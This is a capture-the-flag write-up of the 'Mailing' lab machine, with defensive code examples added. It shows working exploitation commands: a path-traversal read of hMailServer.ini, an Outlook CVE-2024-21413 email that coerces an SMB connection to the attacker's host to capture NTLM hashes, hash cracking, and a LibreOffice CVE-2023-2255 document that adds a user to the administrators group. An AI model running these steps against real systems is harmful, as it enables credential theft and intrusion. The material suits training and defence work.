Mailing

Recon

nmap_scan.log

Add hostname to dns:

└─$ echo '10.10.11.14 mailing.htb' | sudo tee -a /etc/hosts

HTTP (80)

Pasted_image_20240527194440.png

From the site's instructions we know that the user maya exists and that a default account user:password was created, probably for the demo and since deleted. (Those creds don't work for SMTP.)

Get IIS Config:

curl http://mailing.htb/download.php?file=../web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <rewrite>
            <rules>
                <rule name="HostName" stopProcessing="true">
                    <match url=".*" />
                    <conditions>
                        <add input="{HTTP_HOST}" pattern="^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$" />
                    </conditions>
                    <action type="Redirect" url="http://mailing.htb" />
                </rule>
            </rules>
        </rewrite>
    </system.webServer>
</configuration>

Nothing interesting in the config itself, but download.php gives us an LFI (path traversal file read).
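To pin the bug class down from the defender's side, here is an added example (my code, not the box's download.php, whose PHP source is not on the page). It shows the unchecked path join beside a contained version, and a check that pulls traversal attempts like the requests in this writeup out of IIS W3C log lines. The download root, the log lines and their field order are constructed for the example and assume a POSIX host.

```python
"""Added example: path traversal in a download endpoint, its fix, and a log check.
Not the Mailing box's download.php; the root and the log lines are constructed."""
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Hypothetical directory the endpoint is meant to serve files from.
DOWNLOAD_ROOT = "/srv/mailing/instructions"


def vulnerable_resolve(user_file: str) -> str:
    """The bug class: user input joined to the root with no containment check,
    so 'file=../web.config' walks straight out of DOWNLOAD_ROOT."""
    return os.path.join(DOWNLOAD_ROOT, user_file)


def hardened_resolve(user_file: str) -> Optional[str]:
    """Decode, canonicalise, then refuse anything that does not stay strictly
    below DOWNLOAD_ROOT (the caller turns None into a 404)."""
    # On Windows/IIS a backslash is a separator too; normalise before checking.
    cleaned = unquote(user_file).replace("\\", "/")
    root = os.path.realpath(DOWNLOAD_ROOT)
    # An absolute input such as /etc/passwd makes os.path.join drop the root,
    # which is exactly why the containment check below is needed.
    candidate = os.path.realpath(os.path.join(root, cleaned))
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


# Constructed IIS W3C log excerpt (field order given by the #Fields line).
SAMPLE_IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-05-27 19:44:40 10.10.11.14 GET /download.php file=instructions.pdf 80 - 10.10.16.74 curl/8.5.0 200
2024-05-27 19:45:02 10.10.11.14 GET /download.php file=../web.config 80 - 10.10.16.74 curl/8.5.0 200
2024-05-27 19:45:30 10.10.11.14 GET /download.php file=..%2F..%2F..%2F..%2F..%2FProgram%20Files%20(x86)%2FhMailServer%2FBin%2FhMailServer.ini 80 - 10.10.16.74 curl/8.5.0 200
2024-05-27 19:46:11 10.10.11.14 GET /index.php - 80 - 10.10.16.74 Mozilla/5.0 200
"""

# A '..' segment followed by a separator (or end of string), checked after decoding.
TRAVERSAL = re.compile(r"\.\.(?:[/\\]|$)")


def find_traversal_requests(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (time, client_ip, decoded_query) for requests whose query string
    contains a '..' path segment once URL-encoding is removed."""
    hits = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 9:
            continue
        time, query, client = parts[1], unquote(parts[5]), parts[8]
        if TRAVERSAL.search(query):
            hits.append((time, client, query))
    return hits


if __name__ == "__main__":
    print(vulnerable_resolve("../web.config"))
    print(hardened_resolve("../web.config"))
    for hit in find_traversal_requests(SAMPLE_IIS_LOG):
        print(hit)
```

The containment check is done on the canonical path rather than by rejecting the substring `..`, so encoded, backslash and absolute-path variants all fall out the same way; the log check decodes before matching for the same reason.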

Find config files of hMailServer:

https://www.hmailserver.com/documentation/v5.4/?page=reference_inifilesettings https://www.hmailserver.com/forum/viewtopic.php?t=14994

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ curl 'http://mailing.htb/download.php?file=../../../../../Program%20Files%20(x86)/hMailServer/Bin/hMailServer.ini' --path-as-is
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ curl 'http://mailing.htb/download.php?file=../../../../../Program%20Files%20(x86)/hMailServer/Data/hMailServer.ini' --path-as-is
File not found.                                                                                          
Pasted_image_20240527202007.png

Cracking the AdministratorPassword MD5 hash from hMailServer.ini (screenshot above) gives the password: homenetworkingadministrator

Since we are only dealing with an SMTP service and nothing else, I tried searching for "Microsoft Outlook Remote Code Execution Vulnerability" and ended up on CVE-2024-21413. We know the OS is Windows, hence Outlook. The CVE also needs valid credentials, and we have those too.

Setup responder:

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─$ sudo responder -I tun0
...
# Note: the lines below appear some time after the email has been sent
[SMB] NTLMv2-SSP Client   : 10.10.11.14
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash     : maya::MAILING:d4a8169e98107668:14C4AAF6E158C6FD28AECFA1FB11D2F6:01010000000000008055D20E2DA4DA0150B19C607AD6C_620000000002000800_0005_00_700_70001001E00570049004E002D005_005800_0005500_2004B005700_200_20048005A000400_400570049004E002D005_005800_0005500_2004B005700_200_20048005A002E00_0005_00_700_7002E004C004F004_0041004C000_001400_0005_00_700_7002E004C004F004_0041004C0005001400_0005_00_700_7002E004C004F004_0041004C00070008008055D20E2DA4DA0106000400020000000800_000_0000000000000000000000000200000D49_B88C2E__E_578271052F600A608CAF24E_9D76D45552CB707B69A7B1EC2_0A00100000000000000000000000000000000000090020006_00690066007_002F00_100_0002E00_100_0002E00_100_6002E00_700_4000000000000000000
[*] Skipping previously captured hash for MAILING\maya
[*] Skipping previously captured hash for MAILING\maya
[*] Skipping previously captured hash for MAILING\maya
[*] Skipping previously captured hash for MAILING\maya
[*] Skipping previously captured hash for MAILING\maya
[*] Skipping previously captured hash for MAILING\maya

Note: port 25 didn't work because of TLS, 465 hung, and 587 was successful.

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─$ py CVE-2024-21413.py \
        --server 10.10.11.14 \
        --port 587 \
        --username administrator@mailing.htb \
        --password homenetworkingadministrator \
        --sender administrator@mailing.htb \
        --recipient maya@mailing.htb \
        --url //10.10.16.74/uwu \
        --subject uwu

CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
Alexander Hagenah / @xaitax / ah@primepage.de

✅ Email sent successfully.

Note: the URL is Responder's IP (ours); the share name can be literally anything.

Using Responder we capture the NetNTLMv2 response of the user who opened the link, in this case maya.
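What this looks like from the blue side: a mail client opening a UNC path makes Outlook initiate SMB to a host it has no business talking to. Here is an added example (my code, not part of this writeup) of a hunt over Sysmon-style Event ID 3 network-connection records for exactly that pattern. The records, the approved file-server list and the internal address range are constructed for the example.

```python
"""Added example: flag outbound SMB from mail clients or to unexpected hosts.
Not part of the writeup; events, allowlist and internal ranges are constructed."""
import ipaddress
import json
from typing import List, Tuple

SMB_PORTS = {445, 139}
# Hypothetical: the only hosts a workstation should ever open SMB to.
APPROVED_SMB_SERVERS = {"10.10.11.20", "10.10.11.21"}
# Hypothetical corporate range; SMB leaving it is a hard finding.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]
# Client applications that should never initiate SMB sessions themselves.
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe", "hxoutlook.exe"}

# Constructed Sysmon Event ID 3 records, one JSON object per line.
SAMPLE_EVENTS = r"""
{"UtcTime": "2024-05-27 19:50:01", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "User": "MAILING\\maya", "Initiated": "true", "DestinationIp": "10.10.16.74", "DestinationPort": 445}
{"UtcTime": "2024-05-27 19:50:03", "Image": "C:\\Windows\\explorer.exe", "User": "MAILING\\maya", "Initiated": "true", "DestinationIp": "10.10.11.20", "DestinationPort": 445}
{"UtcTime": "2024-05-27 19:50:09", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "User": "MAILING\\maya", "Initiated": "true", "DestinationIp": "10.10.11.14", "DestinationPort": 587}
{"UtcTime": "2024-05-27 19:51:40", "Image": "C:\\Windows\\System32\\svchost.exe", "User": "NT AUTHORITY\\SYSTEM", "Initiated": "true", "DestinationIp": "203.0.113.9", "DestinationPort": 445}
"""


def classify(event: dict) -> List[str]:
    """Return the reasons an outbound SMB connection is suspicious; an empty
    list means the event is either not SMB or looks normal."""
    reasons: List[str] = []
    if event.get("Initiated") != "true" or int(event.get("DestinationPort", 0)) not in SMB_PORTS:
        return reasons
    dst = ipaddress.ip_address(event["DestinationIp"])
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if str(dst) not in APPROVED_SMB_SERVERS:
        reasons.append(f"SMB to non-approved host {dst}")
    if not any(dst in net for net in INTERNAL_NETS):
        reasons.append(f"SMB leaving the internal ranges ({dst})")
    if image in MAIL_CLIENTS:
        reasons.append(f"mail client {image} initiating SMB")
    return reasons


def hunt(jsonl: str) -> List[Tuple[str, str, List[str]]]:
    """Run classify over newline-delimited JSON events and return
    (time, user, reasons) for the suspicious ones, in log order."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        reasons = classify(event)
        if reasons:
            findings.append((event["UtcTime"], event["User"], reasons))
    return findings


if __name__ == "__main__":
    for when, who, why in hunt(SAMPLE_EVENTS):
        print(when, who, "; ".join(why))
```

The first record is the coerced authentication from this box (Outlook reaching the attacker's SMB listener), the last is a generic SMB egress to a non-internal address; the explorer.exe connection to an approved file server and Outlook's own SMTP submission on 587 produce nothing. Blocking 445/139 at the egress point removes the whole class regardless of which client bug triggers it.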

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─$ echo 'maya::MAILING:...0000000' > maya.hash

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─$ hashcat --show maya.hash
5600  NetNTLMv2  Network Protocol

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─$ hashcat -m 5600 -a 0 maya.hash $rockyou
hashcat (v6.2.6) starting

MAYA::MAILING:...0000000000:m4y4ngs4ri

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\maya\Documents> whoami
mailing\maya

*Evil-WinRM* PS C:\Users\maya> tree /f
Folder PATH listing
Volume serial number is 9502-BA18
C:.
├───3D Objects
├───Contacts
├───Desktop
│       Microsoft Edge.lnk
│       user.txt
└───Documents
    │   mail.py
    │   mail.vbs
    └───WindowsPowerShell
        └───Scripts
            └───InstalledScriptInfos

User.txt

*Evil-WinRM* PS C:\Users\maya> type desktop/user.txt
6a89b3aa31790dac85a279d720a17df4

SMTP (25)

ExploitNotes: SMTP / SMTP Auth

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ telnet $target 25
Trying 10.10.11.14...
Connected to 10.10.11.14.
Escape character is '^]'.
220 mailing.htb ESMTP
> EHLO x # Identify service
250-mailing.htb
250-SIZE 20480000
250-AUTH LOGIN PLAIN
250 HELP

Note: the > symbol marks client input (me).

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ openssl s_client -crlf -connect $target:465
Connecting to 10.10.11.14
CONNECTED(0000000_)
Cant use SSL_get_servername
depth=0 C=EU, ST=EU\Spain, L=Madrid, O=Mailing Ltd, OU=MAILING, CN=mailing.htb, emailAddress=ruy@mailing.htb
...
220 mailing.htb ESMTP

/* Not relevant
MAIL FROM: ruy@mailing.htb
RCPT TO: maya@mailing.htb
DATA
*/

No useful information from raw SMTP interaction.
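The EHLO reply on port 25 does say something useful from a hardening point of view: the server advertises AUTH LOGIN PLAIN without STARTTLS, so anyone who does authenticate there sends the password base64-encoded over a cleartext session. Here is an added example (my code, not part of the writeup) that parses an EHLO reply and judges the exposure; the first reply is the one captured above, the second is a constructed STARTTLS-capable variant.

```python
"""Added example: judge what an SMTP listener exposes from its EHLO reply.
Not part of the writeup; one reply is the captured port-25 one, the other is constructed."""
from typing import Dict, List

# Captured above on port 25 (no TLS wrapping, no STARTTLS offered).
EHLO_PORT25 = """\
250-mailing.htb
250-SIZE 20480000
250-AUTH LOGIN PLAIN
250 HELP
"""

# Constructed: a server that only offers AUTH after STARTTLS.
EHLO_WITH_STARTTLS = """\
250-mail.example.test
250-SIZE 20480000
250-STARTTLS
250 HELP
"""


def parse_ehlo(reply: str) -> Dict[str, List[str]]:
    """Map each advertised keyword to its parameters; the hostname on the first
    line is stored under 'HOST'. Any line that is not a 250 continuation
    ('250-') or final ('250 ') line is rejected."""
    caps: Dict[str, List[str]] = {}
    for index, line in enumerate(l for l in reply.splitlines() if l.strip()):
        code, sep, rest = line[:3], line[3:4], line[4:]
        if code != "250" or sep not in ("-", " "):
            raise ValueError(f"unexpected EHLO reply line: {line!r}")
        words = rest.split()
        if not words:
            continue
        if index == 0:
            caps["HOST"] = words[:1]
        else:
            caps[words[0].upper()] = words[1:]
    return caps


def assess_smtp_listener(reply: str, port: int, implicit_tls: bool) -> List[str]:
    """Findings for one listener. implicit_tls is True when the socket was
    TLS-wrapped before EHLO (the 465 style), False for a plain socket."""
    caps = parse_ehlo(reply)
    findings: List[str] = []
    if not implicit_tls and "STARTTLS" not in caps:
        findings.append(f"port {port}: no STARTTLS, the whole session is cleartext")
        if "AUTH" in caps:
            mechanisms = " ".join(caps["AUTH"])
            findings.append(
                f"port {port}: AUTH {mechanisms} accepted in cleartext; "
                "LOGIN/PLAIN only base64-encode the password, they do not protect it")
    return findings


if __name__ == "__main__":
    for finding in assess_smtp_listener(EHLO_PORT25, 25, implicit_tls=False):
        print(finding)
```

The same reply judged on 465 produces nothing, because the TLS wrapper already covers the credentials; the fix on 25/587 is to advertise STARTTLS and refuse AUTH until it has been negotiated.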

Privilege Escalation

*Evil-WinRM* PS C:\Users\maya\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                                  State
============================= ============================================ =======
SeChangeNotifyPrivilege       Omitir comprobación de recorrido             Enabled
SeUndockPrivilege             Quitar equipo de la estación de acoplamiento Enabled
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Enabled
SeTimeZonePrivilege           Cambiar la zona horaria                      Enabled
*Evil-WinRM* PS C:\Users\maya\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                   Type             SID          Attributes
============================================ ================ ============ ==================================================
Todos                                        Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users              Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios                             Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios de escritorio remoto        Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                         Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados         Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compañía                   Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticación NTLM              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label            S-1-16-8192
*Evil-WinRM* PS C:\Users\maya\Documents>

Windows Defender is active and WinPEAS/PrivescCheck.ps1 got blocked, so on to manual enumeration...

*Evil-WinRM* PS C:\Program Files> dir

    Directory: C:\Program Files

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         2/27/2024   5:30 PM                Common Files
d-----          3/3/2024   4:40 PM                dotnet
d-----          3/3/2024   4:32 PM                Git
d-----         4/29/2024   6:54 PM                Internet Explorer
d-----          3/4/2024   6:57 PM                LibreOffice
d-----          3/3/2024   4:06 PM                Microsoft Update Health Tools
d-----         12/7/2019  10:14 AM                ModifiableWindowsApps
d-----         2/27/2024   4:58 PM                MSBuild
d-----         2/27/2024   5:30 PM                OpenSSL-Win64
d-----         3/13/2024   4:49 PM                PackageManagement
d-----         2/27/2024   4:58 PM                Reference Assemblies
d-----         3/13/2024   4:48 PM                RUXIM
d-----         2/27/2024   4:32 PM                VMware
d-----          3/3/2024   5:13 PM                Windows Defender
d-----         4/29/2024   6:54 PM                Windows Defender Advanced Threat Protection
d-----          3/3/2024   5:13 PM                Windows Mail
d-----          3/3/2024   5:13 PM                Windows Media Player
d-----         4/29/2024   6:54 PM                Windows Multimedia Platform
d-----         2/27/2024   4:26 PM                Windows NT
d-----          3/3/2024   5:13 PM                Windows Photo Viewer
d-----         4/29/2024   6:54 PM                Windows Portable Devices
d-----         12/7/2019  10:31 AM                Windows Security
d-----         3/13/2024   4:49 PM                WindowsPowerShell

LibreOffice is out of the ordinary for a Windows installation; usually we'd see Microsoft Office, and given that Outlook is in use here it's a bit odd.

*Evil-WinRM* PS C:\Program Files> cd LibreOffice
*Evil-WinRM* PS C:\Program Files\LibreOffice> cmd /c "dir /s/b *.txt" | sls -NotMatch extensions

C:\Program Files\LibreOffice\license.txt
C:\Program Files\LibreOffice\help\media\icon-themes\README.txt
C:\Program Files\LibreOffice\program\python-core-3.8.12\lib\lib2to3\Grammar.txt
C:\Program Files\LibreOffice\program\python-core-3.8.12\lib\lib2to3\PatternGrammar.txt
C:\Program Files\LibreOffice\program\python-core-3.8.12\lib\site-packages\README.txt
C:\Program Files\LibreOffice\readmes\readme_en-GB.txt
C:\Program Files\LibreOffice\readmes\readme_en-US.txt
C:\Program Files\LibreOffice\readmes\readme_en-ZA.txt
C:\Program Files\LibreOffice\readmes\readme_es.txt
C:\Program Files\LibreOffice\share\gallery\personas\personas_list.txt

*Evil-WinRM* PS C:\Program Files\LibreOffice> cat 'C:\Program Files\LibreOffice\readmes\readme_en-US.txt' | select -First 10
======================================================================
LibreOffice 7.4 ReadMe
======================================================================

The installation is really old (7.4). Before going further into random old software, let's check the permissions on it first using icacls:

*Evil-WinRM* PS C:\Program Files> icacls LibreOffice
LibreOffice NT SERVICE\TrustedInstaller:(I)(F)
            NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
            BUILTIN\Administradores:(I)(F)
            BUILTIN\Administradores:(I)(OI)(CI)(IO)(F)
            BUILTIN\Usuarios:(I)(RX)
            BUILTIN\Usuarios:(I)(OI)(CI)(IO)(GR,GE)
            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
            ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIONES:(I)(RX)
            ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIONES:(I)(OI)(CI)(IO)(GR,GE)
            ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX)
            ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files

Normal users (BUILTIN\Usuarios) only have (RX) on the directory and (GR,GE) inherited below it, i.e. Generic Read/Generic Execute, so the installation itself can't be tampered with.
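Reading icacls output by eye gets error-prone once the principals are localised, so here is an added example (my code, not part of the writeup) that parses it and reports ACEs granting write-capable rights to low-privilege principals in either English or Spanish naming. The first listing is the LibreOffice one from above; the second is a constructed listing for a shared drop directory.

```python
"""Added example: parse icacls output and flag ACEs that let ordinary users write.
Not part of the writeup; the second listing is constructed."""
import re
from typing import List, Tuple

# From the writeup above (ENTIDAD DE PAQUETES entries omitted for brevity).
LIBREOFFICE_ACL = r"""
LibreOffice NT SERVICE\TrustedInstaller:(I)(F)
            NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
            BUILTIN\Administradores:(I)(F)
            BUILTIN\Administradores:(I)(OI)(CI)(IO)(F)
            BUILTIN\Usuarios:(I)(RX)
            BUILTIN\Usuarios:(I)(OI)(CI)(IO)(GR,GE)
            CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed: a shared folder where every user may create and modify files.
DROP_DIR_ACL = r"""
C:\Important Documents BUILTIN\Administradores:(I)(OI)(CI)(F)
                       NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                       BUILTIN\Usuarios:(OI)(CI)(M)
                       BUILTIN\Usuarios:(I)(OI)(CI)(IO)(DENY)(D)

Successfully processed 1 files; Failed processing 0 files
"""

# principal:(flag)(flag)... ; principals never contain ':' or parentheses.
ACE_RE = re.compile(r"^(?P<who>[^:()]+?):(?P<flags>(?:\([^)]*\))+)$")
# Simple rights and specific rights that allow creating, changing or deleting.
WRITE_RIGHTS = {"F", "M", "W", "GW", "GA", "WD", "AD", "D", "DC", "WDAC", "WO"}
# Substrings (upper-cased) identifying low-privilege principals, EN and ES.
LOW_PRIV_MARKERS = ("\\USERS", "\\USUARIOS", "EVERYONE", "TODOS",
                    "AUTHENTICATED USERS", "USUARIOS AUTENTIFICADOS",
                    "ALL APPLICATION PACKAGES", "TODOS LOS PAQUETES")


def parse_icacls(path: str, text: str) -> List[Tuple[str, List[str]]]:
    """Turn the output of `icacls <path>` into (principal, [tokens]) pairs.
    icacls prints the path only on the first ACE line; later ACEs are indented."""
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):
            line = line[len(path):].strip()
        match = ACE_RE.match(line)
        if not match:
            continue
        tokens = [t for group in re.findall(r"\(([^)]*)\)", match["flags"])
                  for t in group.split(",") if t]
        aces.append((match["who"], [t.upper() for t in tokens]))
    return aces


def low_priv_writable(aces: List[Tuple[str, List[str]]]) -> List[Tuple[str, List[str]]]:
    """ACEs granting (not denying) a write-capable right to a low-privilege
    principal. Inherit-only (IO) entries count too: they govern what gets
    created inside the directory."""
    hits = []
    for who, tokens in aces:
        if "DENY" in tokens:
            continue
        if not any(marker in who.upper() for marker in LOW_PRIV_MARKERS):
            continue
        rights = sorted(set(tokens) & WRITE_RIGHTS)
        if rights:
            hits.append((who, rights))
    return hits


if __name__ == "__main__":
    print(low_priv_writable(parse_icacls("LibreOffice", LIBREOFFICE_ACL)))
    print(low_priv_writable(parse_icacls(r"C:\Important Documents", DROP_DIR_ACL)))
```

For LibreOffice nothing is reported, matching the reading above; for the drop directory the Modify grant to BUILTIN\Usuarios is returned while the explicit deny entry is skipped.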

Searching for CVEs: https://www.cvedetails.com/vulnerability-list/vendor_id-11439/product_id-21008/Libreoffice-Libreoffice.html

Vulnerability Details : CVE-2023-2255

Improper access control in editor components of The Document Foundation LibreOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of LibreOffice documents that used "floating frames" linked to external files, would load the contents of those frames without prompting the user for permission to do so. This was inconsistent with the treatment of other linked content in LibreOffice. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.7; 7.5 versions prior to 7.5.3.

PoC: CVE-2023-2255

But where to put it? Going back to the root directory, I saw an interesting one:

*Evil-WinRM* PS C:\Users\maya> dir /
    Directory: C:\
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         4/10/2024   5:32 PM                Important Documents # <--
d-----         2/28/2024   8:49 PM                inetpub
d-----         12/7/2019  10:14 AM                PerfLogs
d-----          3/9/2024   1:47 PM                PHP
d-r---         3/13/2024   4:49 PM                Program Files
d-r---         3/14/2024   3:24 PM                Program Files (x86)
d-r---          3/3/2024   4:19 PM                Users
d-----         4/29/2024   6:58 PM                Windows
d-----         4/12/2024   5:54 AM                wwwroot

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ git clone https://github.com/elweth-sec/CVE-2023-2255.git

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ cd CVE-2023-2255

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2023-2255]
└─$ py CVE-2023-2255.py --cmd 'net user naya Password123$ /add && net localgroup administrators naya /add' --output exp.odt
File exp.odt has been created !

*Evil-WinRM* PS C:\Important Documents> upload ./CVE-2023-2255/exp.odt

Info: Uploading /home/woyag/Desktop/Rooms/Mailing/CVE-2023-2255/exp.odt to C:\Important Documents\exp.odt
Data: 40760 bytes of 40760 bytes copied
Info: Upload successful!

Hmm... some kind of policy was (probably) in place and the user wasn't being created.

Also, the group name was wrong because the system isn't in English:

*Evil-WinRM* PS C:\Important Documents> net user localadmin
User name                    localadmin
Local Group Memberships      *Administradores
Global Group memberships     *Ninguno

Recreate the payload:

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2023-2255]
└─$ py CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output exp2.odt
File exp2.odt has been created !

*Evil-WinRM* PS C:\Important Documents> upload ./CVE-2023-2255/exp2.odt

(wait a moment; the file gets picked up and deleted afterwards)

*Evil-WinRM* PS C:\Important Documents> net user maya
User name                    maya
Local Group Memberships      *Administradores      *Remote Management Use
                             *Usuarios             *Usuarios de escritori
Global Group memberships     *Ninguno

Method 1

Check whether UAC is enabled:

*Evil-WinRM* PS C:\Users\maya> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    ConsentPromptBehaviorUser    REG_DWORD    0x3
    DelayedDesktopSwitchTimeout    REG_DWORD    0x0
    DisableAutomaticRestartSignOn    REG_DWORD    0x1
    DSCAutomationHostEnabled    REG_DWORD    0x2
    EnableCursorSuppression    REG_DWORD    0x1
    EnableFullTrustStartupTasks    REG_DWORD    0x2
    EnableInstallerDetection    REG_DWORD    0x1
    EnableLUA    REG_DWORD    0x1                         # <---------------
    EnableSecureUIAPaths    REG_DWORD    0x1
    EnableUIADesktopToggle    REG_DWORD    0x0
    EnableUwpStartupTasks    REG_DWORD    0x2
    EnableVirtualization    REG_DWORD    0x1
    PromptOnSecureDesktop    REG_DWORD    0x1
    SupportFullTrustStartupTasks    REG_DWORD    0x1
    SupportUwpStartupTasks    REG_DWORD    0x1
    ValidateAdminCodeSignatures    REG_DWORD    0x0
    disablecad    REG_DWORD    0x0
    dontdisplaylastusername    REG_DWORD    0x0
    legalnoticecaption    REG_SZ
    legalnoticetext    REG_SZ
    scforceoption    REG_DWORD    0x0
    shutdownwithoutlogon    REG_DWORD    0x1
    undockwithoutlogon    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\UIPI
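Rather than eyeballing the listing for EnableLUA, here is an added example (my code, not part of the writeup) that parses `reg query` output for this key and rates the UAC posture, including the value that is absent above: LocalAccountTokenFilterPolicy, which at its default of 0 means a local admin other than the built-in RID 500 account gets a filtered, medium-integrity token when connecting over the network. The first sample is an excerpt of the output above; the second is a constructed, weakened configuration.

```python
"""Added example: rate UAC posture from `reg query ...\Policies\System` output.
Not part of the writeup; the second registry dump is constructed."""
from typing import Dict, List, Optional, Tuple

# Excerpt of the output shown above.
REG_OUTPUT_MAILING = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    ConsentPromptBehaviorUser    REG_DWORD    0x3
    EnableLUA    REG_DWORD    0x1
    PromptOnSecureDesktop    REG_DWORD    0x1
    ValidateAdminCodeSignatures    REG_DWORD    0x0
    legalnoticecaption    REG_SZ
"""

# Constructed: UAC switched off and remote local admins left unfiltered.
REG_OUTPUT_WEAK = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x0
    EnableLUA    REG_DWORD    0x0
    PromptOnSecureDesktop    REG_DWORD    0x0
    LocalAccountTokenFilterPolicy    REG_DWORD    0x1
"""


def parse_reg_query(text: str) -> Dict[str, Tuple[str, Optional[str]]]:
    """Collect 'name  REG_TYPE  data' rows; a REG_SZ with no data yields None."""
    values: Dict[str, Tuple[str, Optional[str]]] = {}
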